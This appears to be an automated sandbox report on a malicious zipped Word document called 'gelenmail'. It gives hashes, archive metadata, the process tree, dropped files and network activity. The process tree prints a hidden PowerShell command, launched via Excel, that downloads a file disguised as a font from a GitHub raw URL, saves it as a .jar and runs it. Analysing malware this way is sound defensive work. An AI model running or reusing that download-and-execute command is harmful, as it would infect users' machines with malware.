File name: | 07_06_19_14_29_34_gelenmail.zip |
Full analysis: | https://app.any.run/tasks/99c23602-6e30-4372-ae1a-5c5ba15a8df8 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 11:20:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 298DD5C982724C4BDAA4CE9523581A7C |
SHA1: | EE47B1F8E4BA347BDF461954C68847E645311B60 |
SHA256: | BA3D805C05B15BCE2F84A16A8C4D06B74C1CD2415B78B17FEB96602F2BD1DA03 |
SSDEEP: | 1536:mKVQi21V5bjfEK5m2me9Dkf+GTnvfr/xgOL+UooboUFXOLBA67S2goWCi:E1VB5Rf9DbGTvfrmG+Uo2oUMGG5i |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 08_07_2013_23-33_gelenmail.docx |
---|---|
ZipUncompressedSize: | 101208 |
ZipCompressedSize: | 98055 |
ZipCRC: | 0x906fcd7a |
ZipModifyDate: | 2019:07:08 23:35:00 |
ZipCompression: | Unknown (99) |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\07_06_19_14_29_34_gelenmail.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
4088 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\08_07_2013_23-33_gelenmail.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2560 | "C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extension CLSID Verification Host Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3200 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3968 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3088 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" %tmp%\\irs5WQ.jar\") }" & %tmp%\\irs5WQ.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3660 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" C:\Users\admin\AppData\Local\Temp\\irs5WQ.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR12D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDE06C5C.png | — | |
MD5:— | SHA256:— | |||
3200 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3860.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3968 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3D23.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q9C1N4MA6HJG6OWHUMUN.temp | — | |
MD5:— | SHA256:— | |||
4088 | WINWORD.EXE | C:\Users\admin\Desktop\~$_07_2013_23-33_gelenmail.docx | pgc | |
MD5:B64D44E277E0AD26968D5A92C69C0C56 | SHA256:15AC686A2EC0EB641EE821F2E74C2FE949EBA94424E430B8C66815A84863A277 | |||
4088 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\08_07_2013_23-33_gelenmail.docx.LNK | lnk | |
MD5:A5D01BE235A34E802C67635EF67D4672 | SHA256:D6B5241699479D308EA33897F281ECBF9BD8227E1D8B5A13F5BDC286A3527F2F | |||
4088 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC92AA07.emf | emf | |
MD5:3C840A930CF7E52977B4C0E08C7AEC74 | SHA256:A8BCBBEEFD99A53EFC3579989E88E18A04CC537BD79E3775D21BDF7585B71C5C | |||
3660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2932 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2932.39384\08_07_2013_23-33_gelenmail.docx | document | |
MD5:6E64370C801AAF939EA59C64D2CEAA21 | SHA256:5D7BA29167BBF3E2B653A036FEA3A23F45518B1D2642175419749E60C8252602 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3660 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |
Domain | IP | Reputation |
---|---|---|
raw.githubusercontent.com |
| shared |